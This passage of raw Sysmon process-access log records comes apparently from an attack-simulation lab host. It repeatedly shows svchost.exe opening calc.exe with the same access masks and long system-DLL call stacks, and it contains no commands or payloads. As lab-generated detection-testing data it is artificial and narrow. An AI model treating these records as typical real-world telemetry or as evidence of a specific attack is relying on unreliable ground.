22:12:48.140{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360533Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.140{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360532Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.140{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360531Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.124{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360530Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.124{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360529Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.124{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360528Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.124{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360527Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.124{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360526Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.124{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360525Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.124{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360524Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.124{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360523Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.124{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360522Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.124{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360521Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.124{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360520Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.124{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360519Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.124{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360518Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.124{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360517Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.124{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360516Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.124{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360515Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.124{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360514Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.124{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360513Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.124{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360512Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 